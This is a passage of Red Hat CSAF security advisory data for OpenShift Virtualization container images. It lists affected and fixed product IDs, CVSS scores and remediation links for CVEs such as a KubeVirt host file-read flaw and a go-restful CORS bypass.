"8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1996", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2022-06-08T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2094982", }, ], notes: [ { category: "description", text: "A flaw was found in CORS Filter feature from the go-restful package. When a user inputs a domain which is in AllowedDomains, all domains starting with the same pattern are accepted. This issue could allow an attacker to break the CORS policy by allowing any page to make requests and retrieve data on behalf of users.", title: "Vulnerability description", }, { category: "summary", text: "go-restful: Authorization Bypass Through User-Controlled Key", title: "Vulnerability summary", }, { category: "other", text: "The go-restful package is a transitive dependency which is being pulled with k8s.io/api and not directly being used anywhere in OpenShift Container Platform (OCP), OpenShift Container Storage, OpenShift Data Foundation, OpenShift Do and OpenShift Pipelines, hence these components are marked as 'Will not fix' or even \"Not affected\".", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1996", }, { category: "external", summary: "RHBZ#2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1996", url: "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", }, ], release_date: "2022-06-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 9.1, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "go-restful: Authorization Bypass Through User-Controlled Key", }, ], }
RHSA-2023:0408
Vulnerability from csaf_redhat
Published
2023-01-25 11:11
Modified
2025-05-02 21:05
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
* golang: syscall: faccessat checks wrong group (CVE-2022-29526)
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
==============
bridge-marker-container-v4.12.0-24
cluster-network-addons-operator-container-v4.12.0-24
cnv-containernetworking-plugins-container-v4.12.0-24
cnv-must-gather-container-v4.12.0-58
hco-bundle-registry-container-v4.12.0-769
hostpath-csi-driver-container-v4.12.0-30
hostpath-provisioner-container-v4.12.0-30
hostpath-provisioner-operator-container-v4.12.0-31
hyperconverged-cluster-operator-container-v4.12.0-96
hyperconverged-cluster-webhook-container-v4.12.0-96
kubemacpool-container-v4.12.0-24
kubevirt-console-plugin-container-v4.12.0-182
kubevirt-ssp-operator-container-v4.12.0-64
kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55
kubevirt-tekton-tasks-copy-template-container-v4.12.0-55
kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55
kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55
kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55
kubevirt-tekton-tasks-operator-container-v4.12.0-40
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55
kubevirt-template-validator-container-v4.12.0-32
libguestfs-tools-container-v4.12.0-255
ovs-cni-marker-container-v4.12.0-24
ovs-cni-plugin-container-v4.12.0-24
virt-api-container-v4.12.0-255
virt-artifacts-server-container-v4.12.0-255
virt-cdi-apiserver-container-v4.12.0-72
virt-cdi-cloner-container-v4.12.0-72
virt-cdi-controller-container-v4.12.0-72
virt-cdi-importer-container-v4.12.0-72
virt-cdi-operator-container-v4.12.0-72
virt-cdi-uploadproxy-container-v4.12.0-71
virt-cdi-uploadserver-container-v4.12.0-72
virt-controller-container-v4.12.0-255
virt-exportproxy-container-v4.12.0-255
virt-exportserver-container-v4.12.0-255
virt-handler-container-v4.12.0-255
virt-launcher-container-v4.12.0-255
virt-operator-container-v4.12.0-255
virtio-win-container-v4.12.0-10
vm-network-latency-checkup-container-v4.12.0-89
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add 